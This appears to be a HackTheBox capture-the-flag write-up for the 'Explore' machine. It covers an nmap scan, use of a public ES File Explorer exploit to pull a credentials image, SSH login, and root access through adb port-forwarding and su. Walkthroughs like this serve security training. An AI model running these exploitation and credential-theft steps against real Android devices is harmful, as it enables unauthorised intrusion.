HackTheBox: Explore Writeups

Initial Foothold

As usual, i started with network scanning using nmap.

sudo nmap -p- -A 10.10.10.247     

Not shown: 998 closed ports
PORT STATE SERVICE VERSION
2PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
42855/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:34 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sun, 22 Aug 2021 09:57:34 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sun, 22 Aug 2021 09:57:40 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:57 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:40 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:57 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:58 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:58 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
Network Distance: 2 hopsTRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 300.71 ms 10.10.14.1
2 301.27 ms 10.10.10.247

Port 59777 have a known vulnerability, the exploit also available on exploit-db

https://www.exploit-db.com/exploits/50070

Exploiting User

Using listPics command, we got interesting file

We can read that interesting file using getFile command

python 50070.py getFile explore.htb /storage/emulated/0/DCIM/creds.jpg
user : kristi
pass : Kr1sT!5h@Rp3xPl0r3!

we can use previous credentials to login with ssh.

user flag located at /sdcard/user.txt

Privilege Escalation

Following from that article, if the adb just can be accessed from localhost only, we must doing port-forwarding

ssh kristi@explore.htb -L 5555:127.0.0.1:5555 -p 2222# on other terminal
adb connect losalhost:5555
adb -s localhost:5555 shell
su

the root flag located at /data/root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store